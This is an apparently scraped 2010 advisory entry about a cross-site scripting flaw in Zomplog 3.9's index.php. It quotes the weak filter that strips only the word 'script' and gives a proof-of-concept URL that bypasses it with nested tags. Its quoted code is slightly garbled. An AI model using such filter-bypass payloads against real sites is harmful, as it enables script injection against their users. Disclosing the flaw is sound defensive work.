Zomplog 3.9 XSS exploit-vulnerability warning-the black bar safety net

2010-04-12T00:00:00
ID MYHACK58:62201026697
Type myhack58
Reporter 佚名
Modified 2010-04-12T00:00:00

Description

漏洞 文件 index.php Vulnerability code:

1 0: // some general xxs protection 1 1: $_GET[’search’] = str_replace(’script’, ’, $_GET[’search’]); 1 2: $_GET[’username’] = str_replace(’script’, ’, $_GET[’username’]); Code just remove the script file keyword, the page is vulnerable toXSSattack

POC http://www.site.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt>\